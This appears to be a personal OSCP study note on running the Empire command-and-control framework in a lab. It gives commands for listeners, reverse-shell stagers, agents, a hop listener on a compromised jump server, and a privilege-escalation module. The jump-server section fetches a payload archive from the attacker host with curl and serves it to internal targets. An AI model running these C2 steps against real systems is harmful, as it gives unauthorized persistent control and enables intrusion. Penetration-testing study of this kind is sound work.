// notes/ Pivoting & Tunneling
🚀

C2

There are many different [C2](https://howto.thec2matrix.com/) frameworks. They can be hosted in the cloud for collaborative red teams

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/c2

C2

There are many different C2 frameworks. They can be hosted in the cloud for collaborative red teams

Empire

Empire components:

  • Listeners are well... listeners. They listen for a connection and facilitate further exploitation
  • Stagers are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents
  • Agents are the equivalent of a Metasploit "Session". They are connections to compromised targets, and allow an attacker to further interact with the system
  • Modules are used to in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server

Listeners

bash
$uselistener http
$set Name CLIHTTP
$set Host 10.10.14.8
$set Port 8000
$execute
$listeners

{% hint style="info" %} Stop a listener using kill CLIHTTP {% endhint %}

<figure><img src="/files/IZswb1alVFembmMRVisA" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

Stagers

Stagers are essentially Empire's payloads used to connect back to the C2 server and create an agent.

Linux Machines

code
01usestager multi/bash
02set Listener CLIHTTP
03execute
<figure><img src="/files/i4e605SDNGkAXfesHFaB" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

Agents

Upload and run payload on target machine and check

code
01agents
02interact [ID]
03help

Hop Listeners

Hop listeners create files to be copied across to the compromised "jump" server and served from there. The files contain instructions to connect back to our C2 listener

code
01uselistener http_hop
02set RedirectListener CLIHTTP
03set Host 10.200.101.200 <--- compromised webserver IP
04set port 47000 <--- above 15000
<figure><img src="/files/DorO99TlrJ2CgsTAZ502" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

Hop Listener Stager

code
01usestager multi/launcher
02set Listener http_hop
03execute

Jump server (compromised webserver) setup

On Attacker machine

code
01cd /tmp/http_hop
02sudo zip -r hop.zip *
03python3 -m http.server 80

On jumpserver

code
01mkdir /tmp/hop-adot8 && cd /tmp/hop-adot8
02curl http://10.50.102.164/hop.zip -o hop.zip
03unzip hop.zip
04php -S 0.0.0.0:47000 & <-- Serves on php payloads (php must be installed)
05firewall-cmd --zone=public --add-port 47000/tcp

Execute Payload on internal target

Modules

PowerUp Invoke-AllChecks example

code
01usemodule powershell_privesc_powerup_allchecks
02set Agent [ID]
03execute
04agents
05intereact [ID]